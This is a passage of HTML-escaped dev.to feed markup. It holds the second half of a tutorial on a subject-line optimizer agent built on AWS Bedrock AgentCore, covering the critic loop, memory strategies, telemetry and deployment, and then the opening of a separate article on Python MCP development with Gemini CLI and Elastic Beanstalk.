&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;_n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;generator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;structured_output_model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;SubjectLineList&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;structured_output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;subject_lines&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Critic is told to produce two to four sentences of explicit, actionable guidance. No generic advice — it must reference specific patterns in the candidates it's reviewing. "These lines are too long" is not useful guidance for regeneration. "The urgency phrasing in candidates 3 and 5 reads as promotional spam rather than genuine time pressure. Try anchoring to a specific benefit instead" is.&lt;/p&gt;

&lt;p&gt;That guidance becomes part of the next round's prompt directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;prompt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;regenerate_prompt_builder&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;briefing&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;memory_context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;subject_line&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;survivors&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;guidance&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;n_to_generate&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The surviving candidates and the Critic's diagnosis arrive together. The Generator sees what worked, what didn't and why.&lt;/p&gt;




&lt;h2&gt;
  
  
  VI. AgentCore Memory: four strategies
&lt;/h2&gt;

&lt;p&gt;Memory touches this project in two distinct ways. The Strands session manager writes conversation events automatically and every Generator and Critic turn lands in the session namespace without any code in the agent to make that happen. Separately, &lt;code&gt;recall_for_user&lt;/code&gt; reads extracted patterns explicitly at the start of each optimization run, before any candidate is generated.&lt;/p&gt;

&lt;p&gt;Memory also works on two timescales:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Short-term:&lt;/strong&gt; Within a session, the Strands session manager keeps the full conversation in context, making sure the Critic sees every prior round and the Generator sees every prior critique.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Long-term:&lt;/strong&gt; Across sessions, AgentCore's four extraction strategies run asynchronously, roughly 60 seconds after a session ends, and populate long-term namespaces:&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Strategy&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Namespace&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SEMANTIC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;General facts inferred from session content&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/users/{actor_id}/facts&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;USER_PREFERENCE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Behavioral patterns inferred from what consistently scored well or was pruned&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/users/{actor_id}/preferences&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SUMMARIZATION&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A compressed summary of the session&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/summaries/{actor_id}/{session_id}&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;EPISODIC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A record of what happened&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/episodes/{actor_id}/{session_id}&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The agent never writes subject lines or briefings directly to long-term storage. It writes session events and the strategies decide what is worth keeping and in what form.&lt;/p&gt;

&lt;h3&gt;
  
  
  What the loop reads
&lt;/h3&gt;

&lt;p&gt;At the start of each run, &lt;code&gt;recall_for_user&lt;/code&gt; queries the facts and preferences namespaces using the briefing as the retrieval query. It returns up to five patterns per namespace, ranked by relevance score. Those patterns flow into the round-one generation prompt:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Patterns observed across this user's prior sessions:
- Urgency-led subject lines were pruned in 3 of 4 prior sessions
- Premium and exclusivity framing consistently reached the final shortlist

Inferred preferences for this user:
- Discount and price-led language does not align with observed brand voice
- Sentence case outperformed title case across recent campaigns
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Generator sees what worked and what didn't before producing a single candidate.&lt;/p&gt;




&lt;h2&gt;
  
  
  VII. Observability
&lt;/h2&gt;

&lt;p&gt;The optimization loop runs for 30–90 seconds across up to four rounds. Without instrumentation, a slow run and a failing run look identical from the outside.&lt;/p&gt;

&lt;p&gt;After each completed round, the loop calls an &lt;code&gt;on_round&lt;/code&gt; callback with a &lt;code&gt;RoundLog&lt;/code&gt;. The shell's implementation emits two concurrent signals:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;_emit_round_telemetry&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;RoundLog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;span&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;_tracer&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;start_span&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;optimization_round&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.number&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;round_number&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.candidate_count&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;candidates&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.pruned_count&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pruned&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.top3_average&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;round&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;top3_avg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.top_score&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;round&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;top_score&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.top_subject_line&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;top_subject&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;set_attribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;round.guidance_excerpt&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;round_log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;guidance&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;300&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
    &lt;span class="k"&gt;finally&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;span&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;optimization_round_complete&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;extra&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{...})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An &lt;code&gt;optimization_round&lt;/code&gt; OTel span with seven attributes appears as a child span under each invocation in AgentCore traces. The &lt;code&gt;round.top3_average&lt;/code&gt; and &lt;code&gt;round.top_score&lt;/code&gt; attributes show whether scores are improving across rounds. &lt;code&gt;round.guidance_excerpt&lt;/code&gt; shows what the critic said before each regeneration step — the most useful signal when a run plateaus unexpectedly.&lt;/p&gt;

&lt;p&gt;The same fields appear as a structured &lt;code&gt;log.info&lt;/code&gt; event, queryable in CloudWatch Logs Insights:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fields @timestamp, round_number, top3_average, top_score, guidance_excerpt
| filter @message = "optimization_round_complete"
| sort @timestamp asc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;traceId&lt;/code&gt; field on the log event matches the span ID in the traces UI, so you can move between the two surfaces without losing context.&lt;/p&gt;




&lt;h2&gt;
  
  
  VIII. What I didn't use this time
&lt;/h2&gt;

&lt;p&gt;AgentCore ships with more primitives than this project uses. Some of the ones that didn't make it in are worth naming.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Interpreter&lt;/strong&gt; is the right choice when code has to run in a sandbox: the LLM authors it at runtime, it carries untrusted dependencies or it comes from a source outside the agent's own deployment artifact. The scoring script here has 250 lines of standard library Python, authored by the agent's owner, deployed in the same place as &lt;code&gt;main.py&lt;/code&gt;. There is no organizational or security boundary for Code Interpreter to enforce. Adding a managed sandbox would introduce spin-up latency, a separate billing line, a separate failure mode and a service dependency.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Policy&lt;/strong&gt; manages what agents are allowed to do — which tools they can call, which users can invoke them, which actions are gated behind approval. It earns its place in multi-tenant deployments where different users have different permissions or in agentic workflows where the consequences of a wrong action are hard to reverse.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gateway&lt;/strong&gt; exposes an agent as a managed API endpoint with authentication, rate limiting, and request routing. It's the right choice when the agent is a shared service consumed by multiple callers across organizational boundaries.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Every primitive on this list is genuinely useful for the problems it was designed to solve. The real challenge is identifying which problem you actually have. Adopting every available managed service does not make an agent more sophisticated, and it often makes the system harder to reason about, more expensive to run or even more fragile.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;When evaluating a new service or functionality, think about: what complexity am I introducing alongside it, what failure modes come with it, and whether it meaningfully simplifies the system.&lt;/p&gt;




&lt;h2&gt;
  
  
  IX. How to deploy and run it
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Prerequisites
&lt;/h3&gt;

&lt;p&gt;Before deploying, make sure you have:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An AWS account with Amazon Bedrock access&lt;/li&gt;
&lt;li&gt;The agentcore CLI installed (&lt;code&gt;npm install -g @aws/agentcore-cli&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;AWS credentials configured with permissions for Bedrock, CloudFormation, IAM, ECR, and S3&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To confirm your credentials are working:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws sts get-caller-identity
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Testing locally before deploying
&lt;/h3&gt;

&lt;p&gt;To iterate on the agent without incurring a full deploy cycle, you can run the local dev server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore dev
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This starts the runtime at &lt;code&gt;http://localhost:8080&lt;/code&gt;. Bedrock model calls still go to AWS, so you need valid credentials, but no CloudFormation changes are made. Memory is not active in dev mode unless you export &lt;code&gt;MEMORY_ID&lt;/code&gt; manually with the ID from your deployed memory resource.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyqrnvmprq6udly9i6p62.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyqrnvmprq6udly9i6p62.png" alt=" " width="800" height="553"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Deploying
&lt;/h3&gt;

&lt;p&gt;From the project root:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore deploy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The CLI runs CDK under the hood, synthesizing a CloudFormation stack, bootstrapping the CDK environment if needed, and provisioning the runtime, the memory resource, and the IAM roles. The first deploy takes a couple of minutes. When it completes you'll see a runtime ARN in the output — that ARN is the deployed endpoint.&lt;/p&gt;

&lt;h3&gt;
  
  
  Running an invocation
&lt;/h3&gt;

&lt;p&gt;The project ships with four example briefings under &lt;code&gt;app/subject_line_optimizer/briefing/examples/&lt;/code&gt;. Each is a self-contained campaign briefing JSON ready to send.&lt;/p&gt;

&lt;p&gt;To invoke the deployed agent with the reactivation example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore invoke &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--target&lt;/span&gt; default &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--prompt-file&lt;/span&gt; app/subject_line_optimizer/briefing/examples/reactivation.json &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--session-id&lt;/span&gt; &lt;span class="s2"&gt;"create-an-id-here-001"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--user-id&lt;/span&gt; &lt;span class="s2"&gt;"your-user-id"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--stream&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A few things to note:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;--target default&lt;/code&gt; routes to the deployed endpoint, not the local dev server&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--prompt-file&lt;/code&gt; reads the briefing directly; the CLI wraps it in &lt;code&gt;{"prompt": "..."}&lt;/code&gt; before sending, so pass the raw briefing file&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--session-id&lt;/code&gt; must be at least 33 characters; a UUID works well&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--user-id&lt;/code&gt; scopes the AgentCore Memory namespaces — use a consistent identifier across sessions so the agent accumulates preferences for that user over time&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--stream&lt;/code&gt; prints each chunk as it arrives, so you see the rounds progressing in real time&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Example output
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Optimizing subject lines for: Q3 Lapsed Customer Reactivation

[round 1]
  83.0  Ready to rediscover your favorite things? Claim 25% off now
        (LEN_ACCEPTABLE_20_60, URGENCY_BASE_LIFT, VALUE_PERCENT_OFF)
  80.0  Unlock 25% off – your loyalty reward is ready to claim
        (LEN_ACCEPTABLE_20_60, VALUE_PERCENT_OFF, LOYALTY_LANGUAGE)
  ...
  pruned: 3
  guidance for next round: Avoid overly conversational openings...

[round 2]
  91.2  Claim your 25% loyalty reward – 14 days to save
        (LEN_SWEET_SPOT_30_50, LOYALTY_LANGUAGE)
  ...

=== Final shortlist ===
1. Claim your 25% loyalty reward – 14 days to save
   score 91.2   open-rate band 42.0–50.0%
   ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The final chunk is a machine-readable JSON object with the full shortlist, per-round logs, and plateau status.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;There is currently no built-in UI in the AWS console to browse memory contents. A community-built tool called &lt;strong&gt;AgentCore Memory Browser&lt;/strong&gt; fills this gap.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nwfqoxg0hj2930bz2bt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nwfqoxg0hj2930bz2bt.png" alt=" " width="800" height="493"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqcldl972s83wmmtyrop.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqcldl972s83wmmtyrop.png" alt=" " width="800" height="354"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Closing thoughts
&lt;/h2&gt;

&lt;p&gt;The thing I keep coming back to is that AgentCore doesn't have an opinion about what the agent should look like. Bedrock Agents did, and the opinion was reasonable for a lot of cases. AgentCore gives you a Runtime, a Memory service, a set of primitives, and trusts you to assemble them. &lt;strong&gt;That trust is the feature.&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>bedrock</category>
      <category>agentcore</category>
      <category>aws</category>
      <category>ai</category>
    </item>
    <item>
      <title>MCP Development with Amazon Elastic Beanstalk (EBS)</title>
      <dc:creator>xbill</dc:creator>
      <pubDate>Fri, 08 May 2026 21:56:56 +0000</pubDate>
      <link>https://dev.to/aws-builders/mcp-development-with-amazon-elastic-beanstalk-ebs-4049</link>
      <guid>https://dev.to/aws-builders/mcp-development-with-amazon-elastic-beanstalk-ebs-4049</guid>
      <description>&lt;p&gt;Leveraging Gemini CLI and the underlying Gemini LLM to build Model Context Protocol (MCP) AI applications with Python from a local development environment deployed to the EBS service on AWS.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffom6jxu5nxvinzpzekga.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffom6jxu5nxvinzpzekga.jpeg" width="800" height="437"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Yet another Python MCP Demo?
&lt;/h4&gt;

&lt;p&gt;Yes — thanks for asking.&lt;/p&gt;

&lt;p&gt;Python has traditionally been the main coding language for ML and AI tools. The goal of this article is to provide a minimal viable basic working MCP stdio server that can be run locally without any unneeded extra code or extensions.&lt;/p&gt;

&lt;h4&gt;
  
  
  What Is Python?
&lt;/h4&gt;

&lt;p&gt;Python is an interpreted language that allows for rapid development and testing and has deep libraries for working with ML and AI:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.python.org/" rel="noopener noreferrer"&gt;Welcome to Python.org&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Python Version Management
&lt;/h4&gt;

&lt;p&gt;One of the downsides of the wide deployment of Python has been managing the language versions across platforms and maintaining a supported version.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;pyenv&lt;/strong&gt; tool enables deploying consistent versions of Python:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/pyenv/pyenv" rel="noopener noreferrer"&gt;GitHub - pyenv/pyenv: Simple Python version management&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As of writing — the mainstream python version is 3.13. To validate your current Python:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;admin@ip-172-31-70-211:~/gemini-cli-aws/mcp-lightsail-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;python &lt;span class="nt"&gt;--version&lt;/span&gt;
&lt;span class="go"&gt;Python 3.13.12
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Gemini CLI
&lt;/h4&gt;

&lt;p&gt;If not pre-installed you can download the Gemini CLI to interact with the source files and provide real-time assistance:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; @google/gemini-cli
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Testing the Gemini CLI Environment
&lt;/h4&gt;

&lt;p&gt;Once you have all the tools and the correct Node.js version in place- you can test the startup of Gemini CLI. You will need to authenticate with a Key or your Google Account:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;gemini
&lt;span class="go"&gt;
 ▝▜▄ Gemini CLI v0.40.1
   ▝▜▄
  ▗▟▀ Signed in with Google /auth
 ▝▀ Plan: Gemini Code Assist Standard /upgrade
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Node Version Management
&lt;/h4&gt;

&lt;p&gt;Gemini CLI needs a consistent, up to date version of Node. The &lt;strong&gt;nvm&lt;/strong&gt; command can be used to get a standard Node environment:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/nvm-sh/nvm" rel="noopener noreferrer"&gt;GitHub - nvm-sh/nvm: Node Version Manager - POSIX-compliant bash script to manage multiple active node.js versions&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Python MCP Documentation
&lt;/h4&gt;

&lt;p&gt;The official GitHub Repo provides samples and documentation for getting started:&lt;/p&gt;

